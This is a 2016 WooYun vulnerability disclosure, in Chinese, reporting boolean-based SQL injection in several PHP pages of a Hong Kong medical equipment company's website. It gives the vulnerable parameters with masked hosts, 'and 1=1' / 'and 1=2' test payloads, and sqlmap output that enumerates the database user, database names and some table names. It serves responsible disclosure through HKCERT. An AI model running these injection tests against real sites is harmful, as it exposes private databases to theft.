当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167443

漏洞标题:三星醫療復康器材多处sql注入漏洞(香港地區)

相关厂商:三星醫療復康器材

漏洞作者: 路人甲

提交时间:2016-01-06 23:45

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-06: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

星醫療復康器材有限公司,在醫療器材界已服務三十年。自一九八五年起,本著服務病人,令他們得到最佳的治療,享受美滿的人生。另外,氧氣治療是本公司提供多年之項目,由於成立多年,使我們累積到無數經驗,而病人對氧氣機之保養更是無後顧之憂,負責修理的技師受過專業訓練,對氧氣機的構造非常熟悉。 本公司亦是一家自行設計、生產3-MED品牌輪椅、座廁椅、高背椅、助行架、手杖、柺杖等系列產品的專業生產銷售商。
3-MED牌產品是採納最新技術,融匯二十多年經驗,經精心設計和選材而生產的。具有結構牢固,舒適耐用,安全可靠,攜帶方便及造型美觀的特點,與及擁有ISO9001、CE、FDA、ISO7176、ISO7177、BG15797-2002優質正印等多種安全認証。產品暢銷本地各大醫院及歐美各國市場。
2002年本公司引進 iCare LLC, USA為合作伙伴,令 iCare™產品成為市場的新焦點。iCare™以品質優勝,價錢合理,因此而成為本公司一項高質價廉的產品,現在市場上廣泛大受歡迎。 特聘註冊護士、物理治療師、職業治療師為各位顧客解決護理、復康等問題。 本公司現有十六間分銷商,分佈香港,九龍,新界及澳門各區。2005年下旬將擴展到中國中山及深圳。

详细说明:

注入点:

http://**.**.**.**/product.php?pid=507


===================================
单引号测试,返回不正常
and 1=1测试 返回正常
and 1=2测试 返回不正常
判定 存在注入
=================================

[11:46:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29, Apache 2.2.27
back-end DBMS: MySQL 5.0.11
[11:46:10] [INFO] fetching current user
[11:46:10] [INFO] retrieved:
[11:46:10] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[11:46:43] [INFO] adjusting time delay to 2 seconds due to good response times
dmeddhk1@
[11:50:01] [ERROR] invalid character detected. retrying..
[11:50:01] [WARNING] increasing time delay to 3 seconds
local
[11:53:10] [ERROR] invalid character detected. retrying..
[11:53:10] [WARNING] increasing time delay to 4 seconds
host
current user: 'dmeddhk1@localhost'


available databases [2]:
[*] dmeddhk1_3med
[*] information_schema


漏洞证明:

全都是布尔型注入:
and 1=1
and 1=2
检测
注入1:

http://**.**.**.**/news.php?news_id=24


注入2:

http://**.**.**.**/product.php?cate_id=60


注入3:

http://**.**.**.**/medinfo.php?mid=73


[12:27:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29, Apache 2.2.27
back-end DBMS: MySQL 5.0.11
[12:27:59] [INFO] fetching current user
[12:27:59] [INFO] resumed: dmeddhk1@localhost
current user: 'dmeddhk1@localhost'


available databases [2]:
[*] dmeddhk1_3med
[*] information_schema


[12:15:50] [INFO] fetching number of tables for database 'dmeddhk1_3med'
[12:15:50] [INFO] retrieved: 13
[12:16:31] [INFO] retrieved: about
[12:19:42] [INFO] retrieved: category
[12:24:32] [INFO] retrieved: disc


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-08 11:48

厂商回复:

已將事件通知有關機構

最新状态:

暂无